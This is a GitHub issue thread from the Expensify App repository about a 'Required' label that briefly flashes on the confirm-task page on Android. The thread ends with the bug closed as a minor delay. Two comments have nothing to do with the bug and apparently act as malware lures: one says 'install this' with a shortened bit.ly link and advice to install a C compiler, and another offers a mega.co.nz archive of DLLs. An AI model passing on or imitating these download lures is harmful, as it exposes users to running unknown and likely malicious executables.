### ISSUE TITLE
Task - Required label appears briefly on confirm task page for 1:1

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#49453]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.37-0
**Reproducible in staging?:** Y
**Reproducible in production?:** Y
**Email or phone of affected tester (no customers):** gocemate+a2182@gmail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
1. Go to 1:1 chat> +> Assign task
2. Enter title> Next
3. Take a look at the right side of Share section

## Expected Result:
Required label should not be present when create task via 1:1 chat

## Actual Result:
Required label briefly appears on confirmation page when create task via 1:1 chat

## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [x] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/0e5f3fed-efac-4f07-aff4-af9dffce8861

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

**Comment by IuliiaHerets** [comment]
@jliexpensify  FYI I haven't added the External label as I wasn't 100% sure about this issue. Please take a look and add the label if you agree it's a bug and can be handled by external contributors

**Comment by websquadpro** [comment]
install this
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Anju023** [comment]
I think this will help you.
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by jliexpensify** [comment]
This is inconsistently happening on Android, I think it's just an overall slight delay. Closing this.
